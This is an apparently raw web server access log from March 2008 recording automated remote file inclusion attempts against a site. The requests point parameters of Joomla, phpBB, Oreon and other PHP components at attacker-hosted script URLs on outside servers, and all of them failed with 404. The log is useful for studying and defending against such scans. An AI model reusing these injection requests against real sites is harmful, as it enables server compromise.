212.227.101.85 - - [17/Mar/2008:06:16:42 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:16:53 -0700] "GET /mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:16:53 -0700] "GET /mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:18:02 -0700] "GET /logs/access_080131.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:18:03 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:18:03 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:18:03 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:18:04 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.95 - - [17/Mar/2008:06:18:27 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.185.237.35 - - [17/Mar/2008:06:18:35 -0700] "GET /logs/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.sel-de-re.tm.fr/boutique/cache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.185.237.35 - - [17/Mar/2008:06:18:40 -0700] "GET /index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.sel-de-re.tm.fr/boutique/cache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
84.16.234.34 - - [17/Mar/2008:06:19:44 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:20:36 -0700] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:20:36 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:20:36 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:20:38 -0700] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:20:38 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:20:38 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:20:57 -0700] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:20:58 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:20:58 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:06:20:59 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:21:01 -0700] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:21:02 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:21:02 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:21:10 -0700] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:21:11 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:21:11 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:06:21:20 -0700] "GET /logs/access_080131.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:21:24 -0700] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:21:24 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:21:24 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:21:25 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:21:25 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:21:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:21:26 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.150.15.135 - - [17/Mar/2008:06:21:55 -0700] "GET /logs/access_071219.log//classes/adodbt/sql.php?classes_dir=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.164.172 - - [17/Mar/2008:06:22:18 -0700] "GET /logs/index.php?option=com_virtuemart&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
86.109.164.172 - - [17/Mar/2008:06:22:18 -0700] "GET /index.php?option=com_virtuemart&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:23:08 -0700] "GET /convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:23:09 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:23:41 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:06:23:46 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:06:23:46 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:06:23:46 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:06:24:47 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:06:24:48 -0700] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:06:24:48 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:06:24:48 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:25:24 -0700] "GET /logs/access_080220.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:25:26 -0700] "GET /logs/access_080220.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:25:34 -0700] "GET /logs/access_080111.log/modifyform.html?code=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:25:35 -0700] "GET /modifyform.html?code=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:25:35 -0700] "GET /logs/modifyform.html?code=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:06:25:59 -0700] "GET ///components/com_performs/performs.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.102.153 - - [17/Mar/2008:06:27:01 -0700] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
87.118.102.153 - - [17/Mar/2008:06:27:01 -0700] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.6.31.103 - - [17/Mar/2008:06:27:05 -0700] "GET /logs/access_070917.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.31.103 - - [17/Mar/2008:06:27:05 -0700] "GET /logs/access_070703.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.14.51.216 - - [17/Mar/2008:06:27:17 -0700] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
84.14.51.216 - - [17/Mar/2008:06:27:17 -0700] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
67.228.60.242 - - [17/Mar/2008:06:27:31 -0700] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
67.228.60.242 - - [17/Mar/2008:06:27:31 -0700] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:06:27:42 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:06:27:42 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.80.134 - - [17/Mar/2008:06:27:56 -0700] "GET /errors.php?error=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
209.62.80.134 - - [17/Mar/2008:06:27:56 -0700] "GET /logs/errors.php?error=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.172.183.206 - - [17/Mar/2008:06:28:47 -0700] "GET /logs/errors.php?error=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
217.172.183.206 - - [17/Mar/2008:06:28:48 -0700] "GET /errors.php?error=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.225.219.10 - - [17/Mar/2008:06:29:16 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Mar/2008:06:29:16 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Mar/2008:06:29:16 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:06:29:20 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:29:23 -0700] "GET /logs/access_080220.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:29:30 -0700] "GET /logs/access_080220.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:29:41 -0700] "GET /logs/access_080220.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.213.181 - - [17/Mar/2008:06:29:46 -0700] "GET /logs/access_080220.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:29:49 -0700] "GET /logs/access_071225.log/modifyform.html?code=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.95.138.95 - - [17/Mar/2008:06:30:23 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.219.10 - - [17/Mar/2008:06:30:28 -0700] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:31:27 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:31:28 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:31:29 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.43.77.58 - - [17/Mar/2008:06:32:46 -0700] "GET ///modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:06:33:22 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:06:33:42 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:06:33:42 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:06:33:42 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:06:33:51 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:06:33:51 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:06:33:52 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:06:34:07 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:06:35:34 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:36:09 -0700] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.115 - - [17/Mar/2008:06:36:40 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:06:37:13 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:06:37:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:37:19 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:37:19 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:37:20 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:06:37:43 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:06:38:00 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:38:01 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:38:02 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:38:02 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.234.34 - - [17/Mar/2008:06:38:39 -0700] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.15.135 - - [17/Mar/2008:06:38:47 -0700] "GET /logs/access_080228.log//codebb/lang_select?phpbb_root_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.15.135 - - [17/Mar/2008:06:38:47 -0700] "GET //codebb/lang_select?phpbb_root_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.15.135 - - [17/Mar/2008:06:38:48 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:06:38:52 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:06:38:53 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:06:38:53 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
